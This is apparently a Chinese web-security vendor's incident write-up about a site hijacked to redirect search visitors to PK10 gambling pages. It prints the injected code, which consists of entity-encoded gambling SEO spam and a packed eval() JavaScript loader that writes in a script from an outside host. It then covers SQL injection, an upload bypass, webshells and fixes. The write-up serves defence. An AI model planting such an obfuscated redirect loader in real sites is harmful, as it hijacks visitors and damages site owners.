打开网站跳转到北京赛车、PK10赌博网站的解决处理办法

     

          客户网站于近日被跳转到赌博网站,打开后直接跳转到什么北京赛车,PK10等内容的网站上

去,客户网站本身做了百度的推广,导致所有访问用户都跳转到赌博网站上去,给客户带来很大的

经济损失,再一个官方网站的形象也受到了影响。我们SINE安全对客户网站进行检查发现,客户网

站的标题TDK被反复篡改成(北京赛车PK10等内容)立刻对该客户网站的安全,进行全面的源代

码安全审计以及网站漏洞检测与网站漏洞修复,检查了客户的首页标题TDK内容确实是被篡改,并

添加了一些加密的恶意代码,代码如下:

 
title北京赛车pk10 p&#
107;10开奖 北京赛车&#
112;k10开奖结果历史&
#35760;录 -  pk10直&#257
73;网metaname="keywords"content="北京赛&#36710
;pk10开奖直播,北&#
20140;赛车pk10官网,&#212
71;京赛车pk10直播&#44
北京赛车pk10开&#22870
;记录,北京赛车pk&#49
;0开奖网,北京赛车&#
112;k10技巧,北京赛&#36
710;pk10走势图,北&#2014
0;赛车pk10公式,北
京赛车pk10软件,&#
21271;京pk10,北京赛&#36
710;,北京pk10官网,&
#44;pk10北京赛车网&#
36186;,北京pk10赛车&#2
3453;软件"metaname="description"content="高赔&#
29575;信誉平台直播网&#123
04;www.dd22cp.c
om】时时精准提供
北京福彩公司详尽&#3
0740;究分析总结,北京&
#112;k10开奖视频,p&#1
07;10结果分析,pk1
0网上投注,北京p&#1
07;10过往各开奖记&#2440
5;,pk10开奖结果,&#
112;k10网上开户,p&#107
;10开奖,专业的开&#2
2870;视频直播资讯网"script t
ype="text/javascript"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parse
Int(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(
/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){ret
urn'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);r
eturn p;}('m["\\9\\d\\1\\l\\i\\a\\n\\0"]["\\8\\4\\6\\0\\a"](\'\\h\\3\\1\\4\\6\\2\\0 \\0\\k\\2\\a\\
e\\7\\0\\a\\q\\0\\5\\g\\b\\f\\b\\3\\1\\4\\6\\2\\0\\7\\3\\4\\1\\e\\7\\o\\0\\0\\2\\3\\p\\5\\5\\8\\
8\\8\\c\\1\\2\\9\\b\\3\\r\\c\\1\\d\\i\\5\\9\\9\\f\\6\\2\\c\\g\\3\\7\\j\\h\\5\\3\\1\\4\\6\\2\\0\\j\')
;',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a
|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))script。


 
 
上述网站代码是ASCII编码,只要转换成Unicode编码,就可以看到加密的真实内容。我们工程

师对代码进行解读,发现该代码写的是根据搜索引擎作为判断条件进行跳转
的代码,通俗来讲就

是说,该代码只针对搜索引擎,网站管理员直接输入网址并不会发
现网站跳转到赌博内容网站

上去,客户的网站通过百度或搜狗搜索会直接跳转到这个
北京赛车、pk10的网站上去。



 
针对于上述的问题,我们立即删除加密的跳转代码,先将客户网站损失降到最低,促使网站正常访

问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全检测,网站到底是因为那些漏洞

被上传木马,并篡改网站首页的呢?经过我们Sine安全工程师对网站代码的详细的安全检测后,发

现该网站系统存在SQL注入漏洞,导致攻击者可以获取到管理员账户和密码,而网站后台的地址用的

也是默认的admin目录名,致使黑客获取密码后,直接登录网站后台,在对网站后台安全检测的时

候,发现产品图片上传功能,存在绕过格式上传脚本木马的漏洞。


 
该网站漏洞产生于网站后台的产品上传页面代码中的$this->getext($filear["name"]); //取得扩

展名$this->set_savename($file); //设置保存文件名,这个代码对文件扩展名可以直接绕过并上传

php格式的脚本文件,从而让攻击者轻易取得网站的权限。客户还反映说,
网站经常被反复的篡改,

导致跳转到赌博网站,找了网站建设的公司,他们也只是删
除掉代码,没过多久就又被篡改跳转了,

导致客户网站损失严重,发生篡改跳转的根本
原因就是网站有漏洞,如果没有修复好网站漏洞,

即使删除掉恶意代码也只是表面上
的工作,不起作用的还是会被反复篡改,于事无补,亡羊补牢一

样。需要对网站进行安
全检测,以及网站漏洞检测,并修复好网站漏洞,清除木马后门,网站安全

部署好,才
会使网站更加的安全稳定运行。
 
 
网站漏洞修复的处理过程如下:
 
 
对客户网站源代码进行安全加固以及防止sql注入的前端过滤代码,网站的后台目录安全设置,更

改admin文件名为@#%admin,对网站后台图片上传功能代码进行漏洞修复,设置上传文件白名单

机制,以及文件上传的目录进行了脚本安全权限设置,禁止进行脚本,对上传的文件扩展也进行了

深入的安全过滤,网站的数据库安全部署,对数据库的连接信息进行加密,删除root管理权限,设

置普通数据库账号,读写分离,新建表,查询表,写入表等数据库正常操作权限,网站后台的账号

密码设置的复杂一些,密码为12位数字+字母+大小写组合,从发现网站漏洞到目前解决问题中,

共查找到脚本木马3个(webshell),一句话小马后门2个,发现网站的模板内容也被篡改了,导致

客户生成首页的时候随之也被加了恶意加密的代码。
 
网站安全预防措施:
 
1.尽量避免网站后台的默认名称如admin manage houtai
 
2.对网站上传目录的权限进行控制。(设置无脚本执行权限)
 
3.网站后台的用户名和密码设置复杂点,数字+字母+大小写+特殊符号组合。
 
4.阿里云虚拟主机用户的FTP账号密码要设置复杂点,数字+字母+大小写+特殊符号组合。
 
5.如果是单独服务器的客户,建议先把服务器的安全部署好,对每个网站的文件夹进行安全部署

,数据库安全部署,,再做网站的安全,否则你网站再安全,服务器不安全也是于事无补。如果对

安全不是太懂的话,建议找专业的网站安全公司去处理解决。

分享: